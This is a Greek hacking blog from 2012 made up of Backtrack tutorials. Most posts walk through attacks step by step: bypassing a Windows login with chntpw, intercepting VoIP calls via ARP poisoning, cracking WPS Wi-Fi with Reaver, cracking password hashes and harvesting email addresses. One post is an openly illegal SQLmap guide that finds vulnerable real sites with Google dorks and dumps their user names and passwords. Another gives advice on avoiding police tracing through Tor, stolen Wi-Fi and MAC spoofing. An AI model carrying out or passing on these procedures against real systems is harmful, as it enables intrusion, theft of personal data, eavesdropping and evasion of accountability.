ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Δευτέρα 31 Δεκεμβρίου 2012

Το Blog NicktheSail0r εκλεισε 1 χρονο

Ευχαριστω ολους οσους με παρακολουθουνε και εχουνε βρει χρησιμους τους οδηγους μου.
Ητανε δυσκολο να διατηρησω το Blog λογο επαγγελματος αλλα με την βοηθεια σας εγινε γνωστο
Η γνωση ειναι δυναμη!!!! ενα μεγαλο δωρο για τους αναγνωστες μου πατηστε εδω
ο κωδικος ειναι ΝικοςοΝαυτης


Κυριακή 30 Δεκεμβρίου 2012

Πως ξεκλειδωνετε τον κωδικο προσβασης στα Windows


Τι θα χρειαστειτε;

1.Backtrack 5 r3 σε LiveUsb
2.chntpw
3.Φυσικη προσβαση στον υπολογιστη

  • Βαζουμε το στικακι στον υπολογιστη που θελουμε να ξεκλειδωσουμε και τρεχουμε τα Backtrack *πρεπει να ειναι στο boot option στο Bios boot from  usb για να μας τρεξει το στικακι* θα μας τρεξει το στικακι επιλεγουμε default  και μετα μας βγαζει στην γραμμη εντολων γραφουμε root για username και toor για κωδικο προσβασης μετα γραφουμε startx για να μας παει στο γραφικο περιβαλλον
  • Παταμε Ctrl+Alt+T και μας ανοιγει ενα τερματικο
  • Γραφουμε fdisk -l

  • Βλεπουμε οτι τα windows ειναι  HPFS/NTFS με id 7
  • Το αλλο partition με id 7 ειναι το recovery των windows οποτε διαλεγουμε το μεγαλυτερο σε blocks δλδ το sda3
  • Οποτε γραφουμε στο ιδιο τερματικο mkdir /mnt/window7 ετσι ωστε να δημιουργησουμε σημειο φορτωσεις του δισκου
  • μετα γραφουμε mount /dev/sda3 /mnt/window7 και φορτωνουμε το σημειο
  • μετα γραφουμε cd /mnt/window7/
 
  • και μετα cd Windows/System32/config
  • και μετα ls και ψαχνουμε να βρουμε το αρχειο SAM
  • οποτε η διαδρομη του αρχειου SAM ειναι /mnt/window7/Windows/System32/config/sam 


  • οποτε μετα 
  • Παταμε Ctrl+Alt+T και ανοιγουμε ενα τερματικο
  • Στο τερματικο γραφουμε cd /pentest/passwords/chntpw 
  • και μετα ./chntpw -i /mnt/window7/Windows/System32/config/sam
  • οπου -i την διαδρομη που βρηκαμε το αρχειο SAM


  •  παταμε 1 και enter βλεπουμε τους χρηστες

  • ο χρηστης με ?????? ειναι γραμμενος με ελληνικους χαρακτηρες
  • μετα γραφουμε το user name που θελουμε να ξεκλειδωσουμε
  • πχ Αdministrator
  • και μετα επιλεγουμε 1 και παταμε enter και θα σβησει τον κωδικο στο user Administrator 


  • *με την επιλογη 2 μπορειτε να αλλαξετε και να βαλετε δικο σας κωδικο η με την 3 να κανετε εναν χρηστη ως διαχειριστη δλδ με administrator δικαιωματα με 4 να ξεκλειδωσετε  η να ενεργοποιησετε  λογαριασμο χρηστη
  • τωρα παταμε Ctrl+c και γραφουμε reboot οταν μας ζητησει να βγαλουμε το στικακι το βγαζουμε και παταμε enter κανει restart και μπαινουμε στα windows χωρις κωδικο :)




Πέμπτη 27 Δεκεμβρίου 2012

Πως υποκλεβετε συνομιλιες μεσω Voip



Τι θα χρειαστειτε;

1.Backtrack 5 r3
2.Wireshark
3.Ενα δικτυο που να χρησιμοποιει Voip 


  • Ανοιγουμε ενα τερματικο και γραφουμε wireshark και μας εμφανιζει σε γραφικη μορφη το wireshark

  • επιλεγουμε eth0 και παταμε start
  • τωρα δηλητηριαζουμε με το ettercap δειτε παλιοτερους οδηγους πως αν δεν ξερετε
  • πηγαινουμε πανω και παταμε telephony και Voip calls
  • επιλεγουμε την συνομιλια και παταμε decode

  •  μετα παταμε play και ακουμε την συνομιλια
εδω μπορειτε να κατεβασετε μια συνομιλια να δειτε πως δουλευει
πατηστε εδω
*Οταν κατεβασετε την συνομιλια απλα ανοιξτε το wireshark επιλεξτε open και  επιλεξτε το αρχειο που κατεβασατε και ακολουθηστε την ιδια διαδικασια αλλα χωρις να δηλητηριασετε το δικτυο με το ettercap



Δευτέρα 24 Δεκεμβρίου 2012

Πως θα φτιαξετε ενα Usb στικακι κατα των ιων



Τι θα χρειαστειτε?

1.Dr web live usb πατηστε εδω
2.Windows
3.Ενα στικακι Usb

  • καθως εχετε κατεβασει το Dr web  βαζετε το στικακι ανοιγετε το αρχειο και επιλεγετε Generate Dr web LiveUsb

  • οταν τελειωσει καντε επανεκινηση του υπολογιστη σας και σας κανει boot απο το στικακι επιλεγετε English και πατατε enter 
  • Οταν σας εμφανισει το γραφικο περιβαλλον του Dr web τοτε μπορειτε να το βαλετε να κανει ανιχνευση ολου του σκληρου σας δισκου για ιους και να επιδιορθωσει την ζημια



*Το Dr Web live Usb μπορειτε να το χρησιμοποιησετε και οταν δεν μπορειτε να μπειτε  στα windows λογω ζημιας απο ιο.θα ανιχνευσει θα διαγραψει και θα σας βοηθησει να μεταφερετε τα αρχεια σας σε ενα εξωτερικο σκληρο αν η ζημια ειναι πολυ μεγαλη ετσι ωστε να μην τα χασετε.

Παρασκευή 21 Δεκεμβρίου 2012

Πως θα μαθετε αν εχετε ιους στα Βacktrack σας



Τι θα χρειαστειτε;

1.Backtrack 5 r3

Οι περισσοτεροι χρηστες των Backtrack μαθαινουνε να κανουνε hacking μεσω οδηγων χωρις να ξερουνε πως και γιατι με συνεπεια να να πεσουνε σε ενα πραγματικο hacker και να τους ανακτησει το συστημα τους χωρις να το καταλαβουνε καθως τα Backtrack δεν εχουνε την ιδια ασφαλεια οπως τα windows και το σημαντικοτερο δεν εχουνε antivirus καθως ειναι κυριως λειτουργικο για επιθεση και ευρεση κενων ασφαλειας σε λειτουργικα και ιστοσελιδες.

  • Πηγαινουμε Applications-Backtrack-Forensics-Anti-Virus Forensics Tools και επιλεγουμε chkrootkit
  • μας ανοιγει το τερματικο και γραφουμε ./chkrootkit και παταμε enter
  • και ετσι βλεπετε αν εχετε rootkit

Πως θα ανακτησετε διεγραμμενα αρχεια απο το USB στικακι σας



Τι θα χρειαστειτε;

1.Backtrack 5 r3
2.Ενα στικακι Usb


  • Βαζουμε το στικακι 
  • ανοιγουμε ενα τερματικο και γραφουμε fdisk -l για να δουμε σε ποια διαδρομη ειναι το στικακι μας 
  • μετα γραφουμε fatback -a /dev/sdb1 -o  /root/arxeia/
  • οπου -a /dev/sdb1 ειναι η διαδρομη που βρισκεται το στικακι μας και με την επιλογη -a θα τα ανακτησει αυτοματα
  • -ο /root/arxeia/ ειναι ο φακελος που θα αποθηκευσει τα διεγραμμενα αρχεια
  •  
     
    * στα windows μπορειται να βρειτε αλλα προγραμματα οπως Disk Recovery κτλ μερικα ομως θα πρεπει να τα αγορασετε
     


Τρίτη 26 Ιουνίου 2012

Πως αναβαθμιζω απο Backtrack 5 R1,R2 σε Backtrack 5 R3

Τι θα χρειαστεις;

1.Backtrack 5 R1,R2
2.Συνδεση internet


1. Ανοιγουμε ενα τερματικο και γραφουμε 
apt-get update && apt-get dist-upgrade
2. Οταν τελειωσει γραφουμε και αυτο 
apt-get install libcrafter blueranger 
dbd inundator intersect mercury
cutycapt trixd00r artemisa rifiuti2 
netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users 
phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit 
spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor 
iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec 
websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn
binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy 
creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit 
smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
(απλα καντε το αντιγραφη επικολληση απο εδω)

Τετάρτη 25 Ιανουαρίου 2012

DVWA - Damn Vulnerable Web App

DVWA ειναι μια εφαρμογη που σας επιτρεπει να εξασκηθειτε σε SQL injection ,XSS και διαφορα σε νομιμο περιβαλλον καθως θα κανετε επιθεση στην δικια σας σελιδα  μπορειτε να δοκιμασετε το sqlmap,sqlninja,hydra,και πολλα αλλα προγραμματα εισβολης σε μια ιστοσελιδα.


Τι θα χρειαστειτε;
1.Backtrack 5R1
2.DVWA download
3.Aυτοματο scritp  download



  • οταν εχετε κατεβασει το DVWA τοτε καντε το extract στον φακελο root 
  • μετα οταν εχετε κατεβασει το Auto.script καντε το να ειναι εκτελεσιμο με δεξι κλικ properties, επιλεξτε να ειναι executable και ανοιξτε το, run in terminal.
  • μετα πηγαινετε Applications -Backtrack-Services-MySQLD-mysql start
  • τελος πητηστε εδω  http://127.0.0.1/login.php βαλτε username 'admin' και password 'password'
  • μετα πατηστε setup και create database και εχετε φτιαξει τα δεδομενα σας
  • τωρα ειστε ετοιμοι να κανετε τις εισβολες σας σε νομιμο περιβαλλον




Πέμπτη 19 Ιανουαρίου 2012

Πως βρισκω και σπαω ενα δικτυο WPA/WPA2 με WPS

Τι θα χρειαστεις;

1.Backtrack 5 R1
2.Reaver
3.WPA/WPA2 δικτυο με Wifi Protected Setup


  • Παταμε εδω και κατεβαζουμε το Reaver
  • μετα αφου το αρχειο reaver-1-3.tar.gz  εχει κατεβει και ειναι στον φακελο root ανοιγουμε ενα τερματικο και γραφουμε
  • tar zxvf reaver-1-3.tar.gz
  • μετα cd reaver-1-3
  • cd src
  • ./configure
  • make
  • make install
  • και ειμαστε ετοιμοι να αρχισουμε (αποσυνδεουμε το δικτυο μας)
  • airmon-ng start wlan0
  • walsh -i mon0 -C
  • βλεπουμε ποιο δικτυο εχει WPS σημειωνουμε την mac address , παταμε ctrl+c  και παμε με το reaver για να το σπασουμε
  • γραφουμε  reaver -i mon0 -b 00:24:40:48:99:99 -vv
  • οπου 
  • -b την mac address του δικτυου που θελουμε να σπασουμε 
  • -vv βαζουμε για να μας δειχνει λεπτομερως τι γινετε
  • αν γραψετε μονο reaver θας σας εμφανισει ολες τις επιλογες που μπορειτε να εφαρμοσετε
  • περιμενουμε και μας εμφανιζει τον κωδικο
  • αν θελετε μπορειτε να πατησετε ctrl+c και να συνεχισετε οποτε εσεις θελετε γιατι σε μερικα ρουτερ κραταει ωρες πχ οταν δοκιμαζει το reaver τους κωδικους, το ρουτερ μετα απο καποιες προσπαθειες κλειδωνει και μετα απο 5 λεπτα δεχετε αλλες προσπαθειες για κωδικους
  • Επιπλεον επιλογες του reaver που θα σας φανουν χρησιμες
  • -a βρισκει αυτοματα τις καλυτερες ρυθμισεις σπασιματος για το δικτυο
  • - l βαλτε ποσος χρονος θα ειναι η αναμονη για να ξαναπροσπαθησει το σπασιμο πχ. -l 630 * οταν σας λεει Warning AP detected limited time retrying .....εφαρμοζετε αυτη την επιλογη συνηθως πανω απο 315 δευτερα βαζετε.
  • -r βαζετε τον χρονο αναμονης στις  ποσες προσπαθειες δλδ -r 315:4 θα κανει 4 προσπαθειες και μετα θα περιμενει πεντε λεπτα και 15 δευτερα μεχρι να ξαναρχισει
  •  -t βαζετε τον χρονο αναμονης ληψης αναμεσα απο καθε προσπαθεια σπασιματος ( pin attemps) δλδ κανετε μια προσπαθεια και περιμενετε αποτελεσμα αυτο τον χρονο ρυθμιζετε οταν σας λεει waarning receive timeout occur συνηθως το αλλαζετε σε μεγαλυτερο
  • -L αγνοειτε το κλειδωμα του ρουτερ και τον χρονο αναμονης που πρεπει να περιμενετε.
  • -S στελνετε μικροτερα πακετα και επιταχυνει το χρονο του σπασιματος
  • τις επιλογες πρεπει να τις βαλετε μετα το -vv  δλδ
  • reaver -i mon0 -b <mac_address> -vv -a -l 630 -r 630:4 -t 5 -L -S κτλ..... 
  • Με αυτη την επιθεση του reaver δεν χρειαζετε να ειναι συνδεδεμενος κανενας χρηστης ουτε χρειαζονται λεξικα για να σπασει το δικτυο επισεις μπορειτε να συνεχισετε οποτε θελετε απο εκει που ειχατε μεινει.

 Πως να προστατευτειτε;

1.Απενεργοποιηστε το WPS στο ρουτερ σας

Τετάρτη 18 Ιανουαρίου 2012

Πως σπαμε Μd5/Sha1 κωδικοποιησεις με john the Ripper


Τι θα χρειαστειτε?

1.Backtrack 5 R1


  • Πρωτα αναγνωριζουμε τον κωδικο τι κωδικοποιηση εχει αν md5 η sha1
  • md5 εχουνε 32 ψηφια fd144f65f19df1c7adaa116c44ce2617 
  • sha1 εχουνε 40 ψηφια 54274c1b66e4db9103a52754b9f88c07567bd846
  • και  στα 2 ειναι κωδικοποιημενο το ονομα Nick
  • Ανοιγουμε ενα τερματικο και γραφουμε 
  •  cd /pentest/passwords/john
  • μετα john --format=raw-md5 /root/md5.txt
  • οπου 
  •  --format= βαζουμε την κωδικοποιηση
  • και /root/md5.txt το αρχειο που εχουμε αποθηκευσει τους κωδικους μεσα
  • οταν μας εμφανισει 
  • No password hashes left to crack
  • γραφουμε john --format=raw-md5  --show /root/md5.txt
  • και μας εμφανιζει τους κωδικους
      Κωδικοποιησεις  που σπαει το john the ripper
  • des/bsdi/md5/bf/afs/lm/bfegg/dmd5/dominosec/epi/hdaa/ipb2/krb4/krb5/mschapv2/mysql-fast/mysql/netlm/netlmv2/netntlm/netntlmv2/nethalflm/ssha/nsldap/md5ns/nt/openssha/phps/po/xsha/crc32/hmac-md5/lotus5/md4-gen/mediawiki/mscash/mscash2/mskrb5/mssql/mssql05/mysql-sha1/oracle11/oracle/phpass-md5/pix-md5/pkzip/raw-md4/raw-md5/raw-sha1/raw-md5u/salted-sha1/sapb/sapg/sha1-gen/trip/raw-sha224/raw-sha256/raw-sha384/raw-sha512/xsha512/hmailserver/sybasease/crypt/ssh/pdf/rar/zip/dummy/dynamic_n
* goog.li σελιδα κωδικοποιησης/αποδικoποιησης και σας βοηθαει να αναγνωρισετε τι ειδος κωδικοποιησης εχει ενας κωδικος

Πως θα σερφαρετε ανωνυμα;


Τι θα χρειαστειτε?

1.Backtrack 5 R1
2.Tor

  • Ανοιγουμε ενα τερματικο και γραφουμε 
  • lsb_release -c
  • και μας εμφανιζει τι διανομη linux εχουμε
  • πχ lucid
  • πηγαινουμε και ανοιγουμε με gedit το αρχειο /etc/apt/sources.list
  • και προσθετουμε κατω αυτη την γραμμη
  • deb     http://deb.torproject.org/torproject.org <DISTRIBUTION> main
    *οπου <destribution> μας την εμφανιζει η πρωτη εντολη που γραψαμε 
  • deb     http://deb/torproject.org/torproject.org lucid main
  • το αποθηκευουμε και το κλεινουμε
  • γραφουμε στο τερματικο
  • gpg --keyserver keys.gnupg.net --recv 886DDD89 
  • μας εμφανιζει αυτο
  • gpg: Total number processed: 1
    gpg:              unchanged: 1
  • μετα γραφουμε 
  • gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
  • μας εμφανιζει ΟΚ
  • μετα apt-get update
  • apt-get install tor tor-geoipdb
  • εχουμε εγκαταστησει το tor χωρις προβληματα παταμε εδω επιτρεπουμε να κανουμε εγκατασταση το torbutton κανουμε ενα restart του firefox και θα δουμε ενα κρεμμυδι αριστερα πανω παταμε πανω του και επιλεγουμε Toggle Tor status οταν γινει πρασινο παταμε εδω για να κοιταξουμε αν εχουμε ρυθμισει σωστα το Tor
  • επισεις μπορειτε να το ελενξετε και εδω αν λεει αλλη ip χωρας ειστε ενταξει αν λεει ip της Ελλαδας τοτε δεν ειστε ενταξει.
Προσοχη

Μερικοι χρησιμοποιουνε το Tor για επιθεσεις σε σελιδες ετσι ωστε να μην εντοπιζοντε
ο καλυτερος τροπος για να μην εντοπιστεις ειναι να χρησιμοποιεις ξενο ασυρματο δικτυο να εχεις αλλαξει την Mac addresss σου και επισεις οταν κανεις την επιθεση να μην μπεις σε καμια σελιδα με τα προσωπικα σου δεδομενα οπως Facebook,hotmail,Gmail κτλ αλλα και παλι αν ειναι να σε εντοπισουνε θα σε εντοπισουνε εφοσον εχεις διαπραξει σοβαρο αδικημα και για να το καταλαβετε σωστα πχ εγω κανω μια επιθεση σε μια σελιδα


Εγω---->tor1---->tor2----->tor3------>tor4--->σελιδα
σελιδα--->tor4--->tor3--->tor2--->tor1--->σε εμενα
δλδ η σελιδα ξερει μονο τον tor4,o tor4 τον tor3 κτλ



οποτε για να με εντοπισουνε πρεπει να βρουνε τα ιχνη του tor4 να πανε στον tor3 μετα tor2 κτλ μεχρι να φτασουνε σε εμενα και μιλαμε για μεγαλη βαση δεδομενων και αν φτασουνε σε εμενα θα φτασουνε στην isp υπηρεσια πχ forhtnet η οποια θα τους πει που ειναι το ρουτερ μου εφοσον εχω διαπραξει καποιο αδικημα αλλα εφοσον δεν ειναι δικο μου το δικτυο και κλεβω ασυρματα θα ερθουνε στην οικια του ρουτερ δλδ καπου κοντα στην γειτονια μου και θα με εντοπισουνε με την mac address μου αλλα εγω την εχω αλλαξει οποτε δεν μπορουνε να κανουνε ταυτοποιηση οτι οντως εγω εκανα την επιθεση βεβαια κανεις δεν ειναι 100% ανωνυμος στο διαδικτυο




Δευτέρα 16 Ιανουαρίου 2012

Πως να κλεβετε στοιχεια απο ιστοσελιδες (SQLmap)


Αυτος ο οδηγος ειναι παρανομος δεν ευθυνομαι για κακοβουλη χρηση του *ΠΡΟΣΟΧΗ μπορουνε να σας εντοπισουνε και να διωχθειτε ποινικα αν επιτεθειτε σε σελιδα.

Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • παμε στο google και κανουμε αναζητηση .php?id=  gr
  • θα μας εμφανισει  ελληνικες και ξενες σελιδες που μπορει να ειναι ευαλωτες σε sql injection
  • επιλεγουμε και ανοιγουμε την σελιδα και στην url βαζουμε ' στο τελος
  • αν μας βγαλει MYSQL warning  η Mysql syntax error τοτε ειναι 100% ευαλωτη
  • *η κατεβαζετε το text αρχειο με Google Dorks download
  • το ανοιγετε κανετε αντιγραφη μια σειρας και επικοληση στην αναζητηση του Google
  • *η κατεβαζετε το  XcodeExploitScanner download
  •  οταν το εχουμε κατεβασει κανουμε extract και μετα παμε στο XcodeExploitScanner.exe δεξι κλικ και εκτελεση ως διαχειριστης
  • εκει που λεει Dork βαζετε τι τυπο σελιδας θελετε να ψαξει πχ αν θελετε για προιοντα inurl:product.php?mid= (θα σας βρει καποια που να σχετιζονται με προιοντα οχι ολα απλα ειναι ενας τροπος για να διαλεξεις που θα επιτεθεις) πατας dork it και σου εμφανιζει σελιδες
  • μετα Scan SQLi και ανιχνευει αν οι σελιδες ειναι ευαλωτες
  • πατατε στο Open results καντε αντιγραφη και καντε επικολληση σε ενα αρχειο text  το οποιο θα μπορειτε να το κοιταξετε μετα με Backtrack
  • *περιπου καθε μια αναζητηση που κανετε πρεπει να πατατε Show Captcha να βαζετε οτι βλεπετε στην εικονα ετσι ωστε να μην μπλοκαρει την ip σας η Google
  • Ανοιγουμε ενα τερματικο και γραφουμε
  •  cd /pentest/database/sqlmap
  • οποτε παμε στο τερματικο μας και γραφουμε 
  • ./sqlmap.py -u [url] --beep
  • πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --beep  
  •  οταν ακουσετε ενα beep τοτε το sqlmap βρηκε ευαλωτη την σελιδα
  • μετα γραφουμε
  • ./sqlmap.py -u [url] --dbs
  • πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --dbs
  • θα μας εμφανισει τα Database πχ

  • available databases [6]:
    [*] dswa
    [*] dswa_stage
    [*] dswawordpress
    [*] information_schema
    [*] mysql
    [*] test 

  • ./sqlmap.py -u [url] --tables -D [database]
  •  μπορειτε να επιλεξετε οτι database θελετε και γραφετε παλι
  • πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --tables -D dswa

  • Database: dswa
    [104 tables]
    +-----------------------------------+
    | access                         
    | accesslog                    
    | actions                        
    | actions_aid                  
    | advanced_help_index  
    | authmap                      
    | autologout                   
    | batch                           
    | blocks                          
    | blocks_roles                
    | boxes                            
    | cache                            
    | cache_block                      
    | cache_content                    
    | cache_filter                     
    | cache_form                       
    | cache_menu                       
    | cache_page                       
    | cache_update                     
    | cache_views                      
    | cache_views_data                 
    | comments                         
    | content_access                   
    | content_field_headername         
    | content_group                    
    | content_group_fields             
    | content_node_field               
    | content_node_field_instance      
    | content_type_education_center_sub
    | content_type_find_alliance       
    | content_type_member_home_page    
    | content_type_member_page         
    | content_type_page                
    | content_type_page_ns             
    | content_type_story               
    | dswa_chapters_main               
    | dswa_chapters_persons            
    | dswa_eventuity_additional        
    | dswa_eventuity_link              
    | dswa_eventuity_main              
    | dswa_profile_additional          
    | dswa_profile_geographic          
    | dswa_profile_images              
    | dswa_profile_main                
    | dswa_store_categories            
    | dswa_store_featured              
    | dswa_store_featured_sample       
    | dswa_store_images                
    | dswa_store_product_categories    
    | dswa_store_products              
    | dswa_taq_articles                
    | dswa_taq_quotes                  
    | dswa_taq_tips                    
    | dswa_taq_topics                  
    | dswa_teleclasses_additional      
    | dswa_teleclasses_main            
    | dswa_teleclasses_speakers        
    | dswa_whatsnew_main               
    | dswa_whatsnew_order              
    | fckeditor_role                   
    | fckeditor_settings               
    | files                            
    | filter_formats                   
    | filters                          
    | flood                            
    | history                          
    | menu_custom                      
    | menu_links                       
    | menu_router                      
    | node                             
    | node_access                      
    | node_comment_statistics          
    | node_counter                     
    | node_revisions                   
    | node_type                        
    | performance_detail               
    | performance_summary              
    | permission                       
    | profile_fields                   
    | profile_values                   
    | role                             
    | search_dataset                   
    | search_index                     
    | search_node_links                
    | search_total                     
    | semaphore                        
    | sessions                         
    | system                           
    | term_data                        
    | term_hierarchy                   
    | term_node                        
    | term_relation                    
    | term_synonym                     
    | upload                           
    | url_alias                        
    | users                            
    | users_roles                      
    | variable                         
    | views_display                    
    | views_object_cache               
    | views_view                       
    | vocabulary                       
    | vocabulary_node_types            
    | watchdog                         
    +-----------------------------------+
  • ./sqlmap.py -u [url] --columns -T [table name] -D [databasename]
  • πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --columns -T user -D dswa
  • Database: dswa
    Table: users
    [19 columns]
    +------------------+------------------+
    | Column           | Type       |
    +------------------+------------------+
    | access         | int(11)        |
    | created        | int(11)        |
    | data             | longtext     |
    | init              | varchar(64) |
    | language     | varchar(12)|
    | login            | int(11)        |
    | mail             | varchar(64)|
    | mode           | tinyint(4)   |
    | name           | varchar(60)|
    | pass            | varchar(32) |
    | picture       | varchar(255) |
    | signature    | varchar(255)|
    | signature_format | smallint(6) |
    | sort             | tinyint(4)       |
    | status          | tinyint(4)       |
    | theme          | varchar(255)|
    | threshold     | tinyint(4)     |
    | timezone     | varchar(8)  |
    | uid              | int(10) unsigned |
    +------------------+------------------+
  • ./sqlmap.py -u [url] --dump -C [column] -T [table name] -D [databasename]
  •  πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --dump  -C pass -T users -D dswa
  • πχ εγω τωρα στοχευσα να επιτεθω και να ανακτησω ολους τους κωδικους απο τα μελη που ειναι γραμμενα στην σελιδα 
  •  ./sqlmap.py -u www.selidathyma.com./php?id=17 --dump  -C name -T users -D dswa
  • και εδω τα ονοματα που εκαναν εγγραφη σε αυτη την σελιδα
  • και ετσι κλεβετε διαφορες πληροφοριες απο μια σελιδα
  • *κακοβουλοι χρηστες κανουνε αυτη την επιθεση με την χρηση του Tor ετσι ωστε να μην εντοπιστουνε.  
  • σχετικο αρθρο που μπορει να σας βοηθησει εδω 
  • η επιλογη --tor στο sqlmap χρησιμοποιει proxy και δεν μπορουν να σας εντοπισουν την ip


Πως θα προστετευτειτε;
1.Μην κανετε εγγραφη σε ευαλωτες σελιδες γιατι με αυτο τον τροπο θα κλεψουνε ονοματα/κωδικους και διαφορα προσωπικα στοιχεια σας τα οποια μπορουνε να χρησιμοποιησουνε για να εισβαλουνε  στο συστημα σας η στην προσωπικη αλληλογραφια σας 
2.Ποτε μην βαζετε προσωπικα δεδομενα σε σελιδες

Σάββατο 14 Ιανουαρίου 2012

Πως να μαζευετε διευθυνσεις ηλεκτρονικης αλληλογραφιας

Με αυτο τον οδηγο θα σας δειξω πως θα μαζευετε διευθυνσεις ηλεκτρονικης αλληλογραφιας απο yahoo,hotmail,gmail κτλ

Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • Ανοιγω ενα τερματικο και γραφουμε msfconsole
  • back
  • use gather/search_email_collector
  • set DOMAIN hotmail.gr 
  • set outfile /root/email.txt
  • run 
  • και θα μας τα εμφανισει και θα τα αποθηκευσει στον φακελο /root σε αρχειο email.txt

  • με αυτο τον τροπο οι spammers και οι διαφημιστες συγκεντρωνουν emails και στελνουνε διαφορα



Πως θα προστατευτειτε;

1.Στο προφιλ σας βγαλτε να ειναι δημοσιο το email σας
2.Και ποτε μην βαζετε το email σας δημοσια σε forum,κοινωνικα δικτυα κτλ

Πως να επιταχυνετε το μTorrent





Τι θα χρειαστειτε;

1.Συνδεση στο ιντερνετ
2.μTorrent

  • Ανοιγουμε το μTorrent και παταμε ctrl+p και μας ανοιγει τις επιλογες 
  • πηγαινουμε συνδεση και εφαρμοζουμε τις ρυθμισεις οπως στην εικονα
  • μετα παμε Ευρος ζωνης και εφραμοζουμε τις ρυθμισεις οπως στην  κατω εικονα
  • μετα BitTorrent οπως στην εικονα
  • μετα προτεραιοτητα οπως στην εικονα κατω
  • και προχωρημενες παμε στο net.max_halfopen και βαζουμε 90 τιμη
  • Τελος .Ειμαστε ετοιμοι να κατεβαζουμε με την μεγιστη ταχυτητα που μπορουμε *οταν κατεβαζετε να κοιτατε τους seeders να ειναι περισσοτεροι απο τους leechers δλδ με απλα λογια να κοιτατε αυτους που το ανεβαζουνε να ειναι περισσοτεροι απο αυτους που το κατεβαζουνε



Τρίτη 10 Ιανουαρίου 2012

Πως θα φτιαξετε δικιες σας λιστες κωδικων για σπασιμο δικτυων


Με αυτο τον οδηγο θα μαθετε να φτιαχνετε λιστες κωδικων


Τι θα χρειαστειτε;

1.Backtrack 5 R1


  • ανοιγουμε ενα τερματικο και γραφουμε 
  • cd /pentest/passwords/crunch
  • μετα ./cruch 4 4 1234567890 -o /root/lexiko.txt
  • με αυτην την εντολη θα δημιουργησετε απο το 0000-9999
  • οπου
  • ''1234567890'' τι θα χρησιμοποιησει για να φτιαξει κωδικους
  • 4 4 το μηκος των κωδικων δλδ 4ψηφια
  • -ο /root/lexiko.txt οτι θα τα αποθηκευσει στον φακελο root σε lexiko.txt ετσι ωστε να το βρειτε ποιο ευκολα
  • ./crunch 4 4 -f charset.lst lalpha -o /root/lexiko.txt
  • με αυτη την εντολη θα δημιουργησετε απο το aaaa-zzzzz
  • οπου
  • 4 4  4ψηφια δλδ το μηκος των κωδικων
  • -f charset.lst οι χαρακτηρες μπορειτε να επιλεξετε πχ απο εδω
  • hex-lower=[0123456789abcdef]
    hex-upper=[0123456789ABCDEF]
    numeric=[0123456789]
    numeric-space=[0123456789 ]
    symbols14=[!@#$%^&*()-_+=]
    symbols14-space=[!@#$%^&*()-_+= ]
    symbols-all=[!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
    symbols-all-space=[!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
    ualpha=[ABCDEFGHIJKLMNOPQRSTUVWXYZ]
    ualpha-space=[ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
    ualpha-numeric=[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
    ualpha-numeric-space=[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
    ualpha-numeric-symbol14= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
    ualpha-numeric-symbol14-space= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
    ualpha-numeric-all = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
    ualpha-numeric-all-space= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
    lalpha=[abcdefghijklmnopqrstuvwxyz]
    lalpha-space=[abcdefghijklmnopqrstuvwxyz ]
    lalpha-numeric=[abcdefghijklmnopqrstuvwxyz0123456789]
    lalpha-numeric-space=[abcdefghijklmnopqrstuvwxyz0123456789 ]
    lalpha-numeric-symbol14=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=]
    lalpha-numeric-symbol14-space=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+= ]
    lalpha-numeric-all=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
    lalpha-numeric-all-space=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
    mixalpha=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
    mixalpha-space=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ]
    mixalpha-numeric=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
    mixalpha-numeric-space=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
    mixalpha-numeric-symbol14=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
    mixalpha-numeric-symbol14-space= [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
